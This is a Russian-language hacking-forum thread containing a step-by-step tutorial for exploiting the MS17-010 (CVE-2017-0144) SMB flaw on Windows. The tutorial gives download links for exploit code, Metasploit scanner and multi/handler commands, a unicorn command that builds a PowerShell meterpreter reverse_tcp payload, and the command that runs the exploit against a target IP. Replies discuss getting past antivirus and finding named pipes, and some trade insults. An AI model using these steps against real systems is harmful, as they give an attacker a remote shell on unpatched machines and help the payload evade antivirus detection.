• Paranoid - курс по анонимности и безопасности в сети от команды codeby. Защита персональных данных, анонимность в сети интернет, настройка виртуальных машин, безопасная передача данных, анти форензика и еще много всего полезного. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Статья CVE-2017-0144 |MS17-010

Tayrus

Grey Team
13.04.2017
216
258
#1
Всем привет, сегодня я вам покажу как эксплуатировать CVE-2017-0144 начнем.
Качаем это:
Код:
https://www.exploit-db.com/exploits/42315/
и это :
Код:
https://github.com/worawit/MS17-010/blob/master/mysmb.py
и вот это:
Код:
https://github.com/trustedsec/unicorn
Кидаем все в одну папку и создаем файл:
Код:
touch _init_.py
Следующим шагом заходим в metasploit.
Пишем :
Код:
use auxiliary/scanner/smb/pipe_auditor
set rhosts <ваша цель>
run
Должно появиться это:
2018-06-06_15-24-46.png
Теперь пишем:
Код:
nmap -A -p 445 <ваша цель>
Нас интересует это:
2018-06-06_15-28-10.png
Далее пишем:
Код:
gedit <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/>
Там, где USERNAME, пишем что получили в nmap(guest)
Ищем этот фрагмент кода:
2018-06-06_15-32-23.png
Убираем комментарий с этой строчки:
2018-06-06_15-33-36.png
Приводим строчку в такой вид:
2018-06-06_15-35-04.png
Теперь создадим нагрузку:
Код:
python unicorn.py windows/meterpreter/reverse_tcp <ваш ip> <порт>
Открываем файл powershell_attack.txt копируем содержимое и вставляем сюда:
2018-06-06_15-43-02.png
Удалим кавычку в конце:
2018-06-06_15-44-04.png
Сохраняем файл.
Выставляем прослушку в metasploit :
Код:
use exploit multi/handler
set lport <port>
set lhost <ваш ip>
set payload  windows/meterpreter/reverse_tcp
exploit
Эксплуатируем:
Код:
python <название файла скачанного отсюда https://www.exploit-db.com/exploits/42315/> <ip цели> <pipe>(например netlogon)
Выполняем команду до тех пор пока не появиться это:
2018-06-06_15-48-48.png
Нам прилетает сессия)
2018-06-06_15-50-08.png
Протестировано на:
Код:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
 
Последнее редактирование:

CHEATER

Well-known member
09.09.2017
47
34
#4
У меня другая методика, я использую unicorn для обхода AV + показал как найти pipe
AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.
 

Tayrus

Grey Team
13.04.2017
216
258
#5
AV, обычно, смотрит на сигнатуры експлойта, да и тип полезной нагрузки в metasploit можно выбрать любой. Но, ваша тема хороша своей легковесностью и да, - тем, что вы показали пример експлуатации с использованием exploit db.
Как говорил @SooLFaa 2018-06-06_17-24-19.png
2018-06-06_17-24-43.png
Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .
 

CHEATER

Well-known member
09.09.2017
47
34
#7
Как говорил @SooLFaa Посмотреть вложение 19038
Посмотреть вложение 19039
Если не веришь мне поставить на систему AV и попробуй через модуль metasploit, а потом через мой метод .
Позвольте уточнить один момент: какое отношение к powershell имеет вот это?
 

CHEATER

Well-known member
09.09.2017
47
34
#9
Ты действовал по моему методу?
Нет, это просто изображение для наглядности.
Насколько я помню (возможно информация не верна, так-как все могло измениться) psexec avast не видит. Так что, оба метода должны закончится успешно.
P.S Вы можете взять классический eternalblue, написать: set payload windows/exec; set CMD calc.exe и посмотреть на результат.
 
Симпатии: Понравилось Tihon49

Elektrolife

Well-known member
21.10.2016
197
28
#11
разве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..

Статья понравилась )
 

Tayrus

Grey Team
13.04.2017
216
258
#12
разве unicorn умеет делать reverse_tcp ? По моему там речь идёт только о reverse_https )) И кстати пайпы не так уж и часто находятся ( Из 15 тестируемы уязвимых машин только на одной увиделись пайпы. Хотя,подозреваю это от того,что нету кредов. Если вписать легитимные креды,увидит намного больше..

Статья понравилась )
Еще как умеет)) Предположительно, чтобы были пайпы на машине, должно быть включено сетевое обнаружение с гостевой учеткой
2018-06-07_11-48-38.png
2018-06-07_11-48-58.png
2018-06-07_11-49-30.png
 
Последнее редактирование:

skill

Премиум
06.02.2018
40
14
#15
Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое

И этот эксп уже бесполезен

и кавычку можно и не удалять что на скрине и разобрав его до конца пишите типа копипаст
 

Tayrus

Grey Team
13.04.2017
216
258
#16
Зачем писать одно и тоже только разными слова?? Об этой уязвимости написано много раз и все же вы ее жуете по сто раз, я по этому экспу в другой теме писал тоже самое
Это связка эксплойтов.

И этот эксп уже бесполезен
Не соглашусь)
 

skill

Премиум
06.02.2018
40
14
#19
Недостойное поведение
Что и требовалось понять что мамкин хекер до конца не поняв что это пытается думать мега хакер
 
Вверх Снизу